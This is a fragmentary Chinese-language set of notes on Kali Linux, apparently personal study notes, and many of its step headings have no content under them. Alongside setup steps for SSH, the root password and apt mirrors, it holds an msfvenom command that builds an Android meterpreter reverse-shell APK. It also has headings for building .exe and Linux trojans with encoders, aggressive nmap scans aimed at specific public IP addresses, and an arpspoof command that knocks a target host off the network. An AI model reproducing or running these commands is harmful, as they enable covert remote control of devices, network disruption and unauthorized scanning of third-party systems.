Kali安装
Kalihttps://www.kali.org/get-kali/
kali连接到与物理机同一网段
1.
2.
完成,目前有效!
给Kali设置root密码
1.sudo passwd root
#输入原密码 例如:root
2.输入两次新密码即可
kali开启22端口
vim /etc/ssh/sshd_config
启动ssh服务
开机启动
连接
搜索引擎
nmap
-p 端口范围 -A深度扫描
目录扫描
扫后缀
从kali中下载到主机
rz #是上传命令
kali控制手机测试
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.3.101 LPORT=8888 R > test.apk
第二步
第三步
第四步
第五步
制作.exe木马测试
加强版
编码器
安卓木马2
域名信息查询
武器库
必选
运行
msfvenom生成linux木马
上帝之眼nmap
nmap -A -v -p80 159.75.90.69 --script http-methods --script-args http.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
sudo nmap -v -sS -p8000-9000 -Pn -T4 -A 124.*.8.* --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"
arp断网中遇到的问题
解决策略
vi /etc/apt/sources.list
需要将原来的注释掉,然后添加新源,以下为国内源列表:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
源替换完后需要更新下:
apt update
sudo arpspoof -i eth0 -t 192.168.3.106 192.168.3.1 #后面的ip是网关,前面的是被攻击ip